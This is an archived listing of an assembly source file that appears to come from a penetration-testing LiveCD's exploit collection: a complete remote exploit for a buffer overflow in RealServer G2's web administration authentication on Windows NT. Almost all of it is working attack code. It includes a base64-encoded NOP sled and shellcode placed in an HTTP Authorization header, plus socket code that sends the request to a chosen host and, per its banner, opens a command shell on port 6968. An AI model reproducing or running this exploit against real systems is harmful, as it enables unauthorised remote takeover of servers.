home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / realserver / realown.asm.txt < prev    next >
Encoding:
Text File  |  2005-02-12  |  14.0 KB  |  443 lines
  1. ; The binary is available at http://www.beavuh.org.
  2. ;
  3. ; This exploits a buffer overflow in RealServers web authentication on
  4. ; the administrator port - hence the reason the shellcode is base64 encoded.
  5. ; This has been tested on the NT version with a default installation.
  6. ; If RealServer is installed in a different directory than the default, the
  7. ; buffer will need to be adjusted accordingly.
  8. ; The administrator port is randomly selected at installation, but as you'll
  9. ; only be testing on your own networks this won't matter :)
  10. ;
  11. ; To assemble:
  12. ;
  13. ; tasm32 -ml realown.asm
  14. ; tlink32 -Tpe -c -x realown.obj ,,, import32
  15. ;
  16. ; TASM 5 required!
  17. ;
  18. ; dark spyrit  <dspyrit@beavuh.org>
  19.  
  20.  
  21. .386p
  22. locals
  23. jumps
  24. .model flat, stdcall
  25.  
  26.  
  27. extrn GetCommandLineA:PROC
  28. extrn GetStdHandle:PROC
  29. extrn WriteConsoleA:PROC
  30. extrn ExitProcess:PROC
  31. extrn WSAStartup:PROC
  32. extrn connect:PROC
  33. extrn send:PROC
  34. extrn recv:PROC
  35. extrn WSACleanup:PROC
  36. extrn gethostbyname:PROC
  37. extrn htons:PROC
  38. extrn socket:PROC
  39. extrn inet_addr:PROC
  40. extrn closesocket:PROC
  41.  
  42.  
  43. .data
  44.  
  45. sploit:
  46.  
  47. db "GET /admin/index.html HTTP/1.0",0dh,0ah
  48. db "Connection: Keep-Alive",0dh,0ah
  49. db "User-Agent: Mozilla/4.04 [en] (X11; I; Beavuh OS .9 i486; Nav)",0dh,0ah
  50. db "Host: 111.111.11.1:1111",0dh,0ah
  51. db "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*",0dh,0ah
  52. db "Accept-Language: en",0dh,0ah
  53. db "Accept-Charset: iso-8859-1,*,utf-8",0dh,0ah
  54. db "Authorization: Basic kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  55. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  56. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  57. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  58. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  59. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  60. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  61. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  62. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  63. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  64. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  65. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  66. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  67. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  68. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  69. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  70. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  71. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  72. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  73. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  74. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  75. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  76. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  77. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  78. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  79. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  80. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  81. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  82. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  83. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  84. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  85. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  86. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  87. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  88. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  89. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  90. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  91. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  92. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  93. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  94. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  95. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  96. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  97. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  98. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  99. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  100. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  101. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  102. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  103. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  104. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  105. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  106. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  107. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  108. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  109. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  110. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  111. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  112. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  113. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  114. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  115. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  116. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  117. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  118. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  119. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  120. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  121. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  122. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  123. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  124. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  125. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  126. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  127. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  128. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  129. db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  130. db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  131. db "JCQkJCQkJCQkJCQkJCQkJCQ6wiQkJBXRToAkJCQkJCQkJCQkJCQkJCQkIt0JPiL/jPAUPf"
  132. db "QUFnyr1mxxovHSIAwmeL6M/aWu5mcQEbB6whW/xOL0PwzybELSTLArITAdflSUVZSs5T/E"
  133. db "6tZWuLsMsCshMB1+bOcVv8Ti9D8M8mxBjLArITAdflSUVZSs5T/E6tZWuLsg8YFM8BQQFB"
  134. db "AUP9X6JNqEFZT/1fsagJT/1fwM8BXULAMq1irQKtfSFBXVq1W/1fASFBXrVatVv9XwEiwR"
  135. db "IkHV/9XxDPAi0b0iUc8iUdAiwaJRzgzwGa4AQGJRyxXVzPAUFBQQFBIUFCtVjPAUP9XyP9"
  136. db "28P9XzP92/P9XzEhQUFP/V/SL2DPAtARQwegEUP9X1IvwM8CLyLUEUFBXUVD/d6j/V9CDP"
  137. db "wF8IjPAUFf/N1b/d6j/V9wLwHQvM8BQ/zdWU/9X+GpQ/1fg68gzwFC0BFBWU/9X/FczyVF"
  138. db "QVv93rP9X2GpQ/1fg66pQ/1fkkNLcy9fc1aqrmdrr/Pjt/Mnw6fyZ3vztyu346+3s6dD3/"
  139. db "/bYmdrr/Pjt/Mnr9vr86urYmdr19ur80fj3/fX8mcn8/PLX+PT8/cnw6fyZ3vX2+/j12PX"
  140. db "19vqZzuvw7fzf8PX8mcv8+P3f8PX8mcr1/Pzpmdzh8O3J6/b6/Orqmc7K1trSqquZ6vb68"
  141. db "vztmfvw9/2Z9fDq7fz3mfj6+vzp7Znq/Pf9mev8+u+Zm5mCoZmZmZmZmZmZmZmZmfr0/bf"
  142. db "84fyZ/////w==",0dh,0ah,0dh,0ah,0
  143.  
  144. sploit_length equ $-sploit
  145.  
  146. logo  db "RealServer G2 exploit [NT] - please check http://www.beavuh.org for info.", 13, 10
  147.       db "by dark spyrit <dspyrit@beavuh.org>",13,10,13,10
  148.       db "usage: realown <host> <admin_port>", 13, 10
  149.       db "eg - realown host.com 6666",13,10
  150.       db "the exploit will spawn a command prompt on port 6968",13,10,0
  151.       logolen equ $-logo
  152.  
  153.  
  154. errorinit db 10,"error initializing winsock.", 13, 10, 0
  155. errorinitl equ $-errorinit
  156.  
  157. derror  db 10,"error.",13,10,0
  158. derrorl equ $-derror
  159.  
  160. nohost db 10,"no host or ip specified.", 13,10,0
  161. nohostl equ $-nohost
  162.  
  163. noport db 10,"no port specified.",13,10,0
  164. noportl equ $-noport
  165.  
  166. reshost db 10,"error resolving host.",13,10,0
  167. reshostl equ $-reshost
  168.  
  169. sockerr db 10,"error creating socket.",13,10,0
  170. sockerrl equ $-sockerr
  171.  
  172. ipill   db 10,"ip error.",13,10,0
  173. ipilll   equ $-ipill
  174.  
  175. cnerror db 10,"error establishing connection.",13,10,0
  176. cnerrorl equ $-cnerror
  177.  
  178. success db 10,"sent.. spawn connection now.",13,10,0
  179. successl equ $-success
  180.  
  181. console_in      dd      ?
  182. console_out     dd      ?
  183. bytes_read      dd      ?
  184.  
  185. wsadescription_len equ 256
  186. wsasys_status_len equ 128
  187.  
  188. WSAdata struct
  189. wVersion dw ?
  190. wHighVersion dw ?
  191. szDescription db wsadescription_len+1 dup (?)
  192. szSystemStatus db wsasys_status_len+1 dup (?)
  193. iMaxSockets dw ?
  194. iMaxUdpDg dw ?
  195. lpVendorInfo dw ?
  196. WSAdata ends
  197.  
  198. sockaddr_in struct
  199. sin_family dw ?
  200. sin_port dw ?
  201. sin_addr dd ?
  202. sin_zero db 8 dup (0)
  203. sockaddr_in ends
  204.  
  205. wsadata WSAdata <?>
  206. sin sockaddr_in <?>
  207. sock dd ?
  208. numbase dd 10
  209. _port db 256 dup (?)
  210. _host db 256 dup (?)
  211. _port2 db 256 dup (?)
  212. buffer db 1000 dup (0)
  213.  
  214. .code
  215. start:
  216.  
  217.         call    init_console
  218.         push    logolen
  219.         push    offset logo
  220.         call    write_console
  221.  
  222.         call    GetCommandLineA
  223.         mov     edi, eax
  224.         mov     ecx, -1
  225.         xor     al, al
  226.         push    edi
  227.         repnz   scasb
  228.         not     ecx
  229.         pop     edi
  230.         mov     al, 20h
  231.         repnz   scasb
  232.         dec     ecx
  233.         cmp     ch, 0ffh
  234.         jz      @@0
  235.         test    ecx, ecx
  236.         jnz     @@1
  237. @@0:        
  238.         push    nohostl
  239.         push    offset nohost
  240.         call    write_console
  241.         jmp     quit3
  242. @@1:
  243.         mov     esi, edi
  244.         lea     edi, _host
  245.         call    parse
  246.         or      ecx, ecx
  247.         jnz     @@2
  248.         push    noportl
  249.         push    offset noport
  250.         call    write_console
  251.         jmp     quit3
  252. @@2:
  253.         lea     edi, _port
  254.         call    parse
  255.  
  256.         push    offset wsadata
  257.         push    0101h
  258.         call    WSAStartup
  259.         or      eax, eax
  260.         jz      winsock_found
  261.  
  262.         push    errorinitl
  263.         push    offset errorinit
  264.         call    write_console
  265.         jmp     quit3
  266.  
  267. winsock_found:
  268.         xor     eax, eax
  269.         push    eax
  270.         inc     eax
  271.         push    eax
  272.         inc     eax
  273.         push    eax
  274.         call    socket
  275.         cmp     eax, -1
  276.         jnz     socket_ok
  277.  
  278.         push    sockerrl
  279.         push    offset sockerr
  280.         call    write_console
  281.         jmp     quit2
  282.  
  283. socket_ok:
  284.         mov     sock, eax
  285.         mov     sin.sin_family, 2
  286.         
  287.         mov     ebx, offset _port
  288.         call    str2num
  289.         mov     eax, edx
  290.         push    eax
  291.         call    htons
  292.         mov     sin.sin_port, ax
  293.         
  294.         mov     esi, offset _host
  295. lewp:
  296.         xor     al, al
  297.         lodsb
  298.         cmp     al, 039h
  299.         ja      gethost
  300.         test    al, al
  301.         jnz     lewp
  302.         push    offset _host
  303.         call    inet_addr
  304.         cmp     eax, -1
  305.         jnz     ip_aight
  306.         push    ipilll
  307.         push    offset ipill
  308.         call    write_console
  309.         jmp     quit1
  310.  
  311. ip_aight:
  312.         mov     sin.sin_addr, eax
  313.         jmp     continue
  314.  
  315. gethost:
  316.         push    offset _host
  317.         call    gethostbyname
  318.         test    eax, eax
  319.         jnz     gothost
  320.  
  321.         push    reshostl
  322.         push    offset reshost
  323.         call    write_console
  324.         jmp     quit1
  325.  
  326. gothost:
  327.         mov     eax, [eax+0ch]
  328.         mov     eax, [eax]
  329.         mov     eax, [eax]
  330.         mov     sin.sin_addr, eax
  331.  
  332. continue:
  333.         push    size sin
  334.         push    offset sin
  335.         push    sock
  336.         call    connect
  337.         or      eax, eax
  338.         jz      connect_ok
  339.         push    cnerrorl
  340.         push    offset cnerror
  341.         call    write_console
  342.         jmp     quit1
  343.  
  344. connect_ok:
  345.         
  346.         xor     eax, eax
  347.         push    eax
  348.         push    sploit_length
  349.         push    offset sploit
  350.         push    sock
  351.         call    send
  352.         push    successl
  353.         push    offset success
  354.         call    write_console
  355.  
  356. quit1:
  357.         push    sock
  358.         call    closesocket
  359. quit2:
  360.         call    WSACleanup
  361. quit3:
  362.         push    0
  363.         call    ExitProcess
  364. parse   proc
  365. ;cheap parsing.. 
  366. lewp9:
  367.         xor     eax, eax
  368.         cld
  369.         lodsb
  370.         cmp     al, 20h
  371.         jz      done
  372.         test    al, al
  373.         jz      done2
  374.         stosb
  375.         dec     ecx
  376.         jmp     lewp9
  377. done:
  378.         dec     ecx
  379. done2:
  380.         ret
  381. endp
  382.  
  383. str2num proc
  384.         push    eax ecx edi
  385.         xor     eax, eax
  386.         xor     ecx, ecx
  387.         xor     edx, edx
  388.         xor     edi, edi
  389. lewp2:
  390.         xor     al, al
  391.         xlat
  392.         test    al, al
  393.         jz      end_it
  394.         sub     al, 030h
  395.         mov     cl, al
  396.         mov     eax, edx
  397.         mul     numbase
  398.         add     eax, ecx
  399.         mov     edx, eax
  400.         inc     ebx
  401.         inc     edi
  402.         cmp     edi, 0ah
  403.         jnz     lewp2
  404.  
  405. end_it:
  406.         pop     edi ecx eax
  407.         ret
  408. endp
  409.  
  410. init_console  proc
  411.         push    -10
  412.         call    GetStdHandle
  413.         or      eax, eax
  414.         je      init_error
  415.         mov     [console_in], eax
  416.         push    -11
  417.         call    GetStdHandle
  418.         or      eax, eax
  419.         je      init_error
  420.         mov     [console_out], eax
  421.         ret
  422. init_error:
  423.         push    0
  424.         call    ExitProcess
  425. endp
  426.  
  427. write_console proc    text_out:dword, text_len:dword
  428.         pusha
  429.         push    0
  430.         push    offset bytes_read 
  431.         push    text_len          
  432.         push    text_out          
  433.         push    console_out       
  434.         call    WriteConsoleA
  435.         popa
  436.         ret
  437. endp
  438.  
  439. end     start
  440.  
  441.  
  442.  
  443.